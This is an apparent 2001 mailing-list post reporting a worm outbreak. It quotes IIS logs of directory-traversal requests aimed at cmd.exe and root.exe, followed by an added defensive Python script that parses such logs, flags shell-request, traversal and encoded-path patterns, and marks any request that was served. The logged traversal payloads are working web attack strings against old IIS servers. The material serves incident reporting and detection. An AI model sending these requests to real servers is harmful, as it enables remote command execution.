massive cmd.exe and root.exe attempts

From: Patrick Beam (pbeamat_private)
Date: Tue Sep 18 2001 - 10:05:55 PDT


    I am as well being hit by this worm.  Everything seems to be coming from
    the same class A 64.*.  I have already seen 1500 plus scans to my web
    servers and that number is climbing rather fast.  This seemed to
    suddenly pop up with little or no warning.  In the past days I have seen
    a few scans here and there but nothing of this magnitude.  I am wondering
    what suddenly changed to cause this type of outbreak?
    
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/root.exe /c+dir 401 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /MSADC/root.exe /c+dir 403 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /c/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /d/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2001-09-18 13:26:03 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:26:04 64.132.124.14 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/root.exe /c+dir 401 -
    2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /MSADC/root.exe /c+dir 403 -
    2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /c/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /d/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:36 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe
    /c+dir 403 -
    2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:37 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:38 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
    2001-09-18 13:31:40 64.132.86.157 - xxx.xxx.xxx.xxx 80 GET
    /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
    
    Patrick Beam
    Senior Systems Administrator
    Agea Corp.
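The log excerpt above is IIS W3C extended format (date, time, client IP, username, server IP, port, method, URI stem, URI query, status, user agent). A small triage script makes the pattern in those lines easier to see at scale: which sources are probing, which indicators each request carries (a `cmd.exe`/`root.exe` stem, a `..` traversal after percent-decoding, a non-ASCII character in the path such as the `Á` in the quoted entries), and, most importantly for a defender, whether any such request got a 2xx rather than the 401/403 refusals shown in the post. This is an added example, not code from the original post or from SecurityFocus; the sample log is constructed to mirror the quoted entries (the server IP, the benign `/index.htm` line and the single 200 response are made up to exercise the checks).

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote

# Constructed sample modelled on the entries quoted in the post. The server IP,
# the benign /index.htm request and the one 200 response are invented so that
# every branch below is exercised; everything else follows the quoted lines.
SAMPLE_LOG = """\
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /MSADC/root.exe /c+dir 403 -
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:03 64.132.124.14 - 10.0.0.5 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:26:04 64.132.124.14 - 10.0.0.5 80 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 401 -
2001-09-18 13:27:10 192.0.2.7 - 10.0.0.5 80 GET /index.htm - 200 Mozilla/4.0
2001-09-18 13:31:36 64.132.86.157 - 10.0.0.5 80 GET /scripts/root.exe /c+dir 401 -
2001-09-18 13:31:37 64.132.86.157 - 10.0.0.5 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 200 -
"""

# Field order of the W3C extended log lines in the post.
FIELDS = ["date", "time", "c_ip", "username", "s_ip", "s_port",
          "method", "stem", "query", "status", "user_agent"]

# A URI stem that ends in cmd.exe or root.exe (case-insensitive), after decoding.
SHELL_RE = re.compile(r"(?:^|/)(?:cmd|root)\.exe$", re.IGNORECASE)
# A parent-directory step; backslashes are normalised to "/" before this runs.
TRAVERSAL_RE = re.compile(r"\.\./")


def parse_line(line):
    """Split one W3C extended log line into named fields; None for blanks/comments."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    parts = line.split(None, len(FIELDS) - 1)
    if len(parts) != len(FIELDS):
        return None
    return dict(zip(FIELDS, parts))


def classify(entry):
    """Return the indicator tags that apply to one entry (empty list = nothing suspicious)."""
    raw = entry["stem"]
    # Percent-decode (%5c, %2f) and fold backslashes so one regex covers both separators.
    decoded = unquote(raw).replace("\\", "/")
    tags = []
    if SHELL_RE.search(decoded):
        tags.append("shell-request")
    if TRAVERSAL_RE.search(decoded):
        tags.append("traversal")
    if any(ord(ch) > 127 for ch in raw):
        tags.append("non-ascii-path")  # e.g. the "..Á.." residue seen in the quoted log
    if tags and entry["status"].startswith("2"):
        tags.append("served-2xx")  # not refused like the 401/403s above: check that host
    return tags


def analyze(log_text):
    """Count flagged requests per source IP and list any that were served with 2xx."""
    per_ip = Counter()
    tags_by_ip = defaultdict(set)
    served = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        tags = classify(entry)
        if not tags:
            continue
        per_ip[entry["c_ip"]] += 1
        tags_by_ip[entry["c_ip"]].update(tags)
        if "served-2xx" in tags:
            served.append((entry["c_ip"], entry["stem"], entry["status"]))
    return {
        "per_ip": dict(per_ip),
        "tags": {ip: sorted(t) for ip, t in tags_by_ip.items()},
        "served": served,
    }


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for ip, count in sorted(report["per_ip"].items(), key=lambda kv: -kv[1]):
        print(f"{ip:16} {count:4} flagged  {', '.join(report['tags'][ip])}")
    for ip, stem, status in report["served"]:
        print(f"INVESTIGATE: {ip} got {status} for {stem}")
```

Run it against a real log with `analyze(open(path, encoding="latin-1").read())`; the decode-then-match step matters because the same probe shows up as `%5c`, `%2f` or a raw non-ASCII byte in different lines, and a filter on the literal string `/winnt/system32/cmd.exe` alone would miss the `..%5c..` variants that IIS normalises differently from the raw request. Every 401/403 in the post is a refused probe; the `served-2xx` tag is the line that should page someone.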
    
    


